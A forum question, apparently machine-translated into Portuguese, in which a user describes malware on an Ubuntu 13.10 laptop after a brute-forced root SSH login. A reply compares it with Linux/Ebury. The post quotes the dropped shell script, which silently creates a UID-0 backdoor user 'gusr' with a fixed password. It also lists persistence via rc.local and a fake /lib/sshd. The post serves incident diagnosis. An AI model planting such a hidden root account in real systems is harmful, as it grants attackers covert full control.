Estou bastante certo de que meu laptop Ubuntu 13.10 está infectado com algum tipo de malware.
De vez em quando, encontro um processo / lib / sshd (de propriedade do root) executando e consumindo muita CPU. Não é o servidor sshd que executa / usr / sbin / sshd.
O binário possui permissões --wxrw-rwt e gera e gera scripts no diretório / lib. Um recente é nomeado 13959730401387633604 e faz o seguinte
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
O usuário gusr foi criado pelo malware de forma independente e, em seguida, o chpasswd trava enquanto consome 100% da CPU.
Até agora, identifiquei que o usuário gusr foi adicionado adicionalmente aos arquivos em / etc /
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
Parece que o malware fez cópias de todos esses arquivos com o sufixo "-". A lista completa dos arquivos / etc / que foram modificados pela raiz está disponível aqui .
Além disso, o arquivo / etc / hosts foi alterado para this .
O / lib / sshd começa adicionando-se ao final do arquivo /etc/init.d/rc.local!
Eu removi o usuário, removi os arquivos, matei a árvore processada, alterei minhas senhas e removi as chaves públicas do ssh.
Estou ciente de que estou basicamente ferrado e provavelmente reinstalarei todo o sistema. No entanto, desde que eu entrei em várias outras máquinas, seria bom pelo menos tentar removê-lo e descobrir como o consegui. Todas as sugestões sobre como fazer isso serão apreciadas.
Parece que eles entraram em 25 de março, forçando o login root com força bruta. Eu não tinha ideia de que o root ssh está ativado por padrão no Ubuntu. Desativei e coloquei denyhosts.
O login era de 59.188.247.236, aparentemente em algum lugar de Hong Kong.
Eu peguei o laptop do EmperorLinux e eles ativaram o acesso root. Se você tem um desses e está executando o sshd, tenha cuidado.
Linux/Ebury
. É outra coisa e, possivelmente, não tem um nome atribuído. Ebury não criaria uma nova conta de usuário e teria modificado a biblioteca compartilhada usada pelo openssh, não descartada em um novo binário chamado sshd.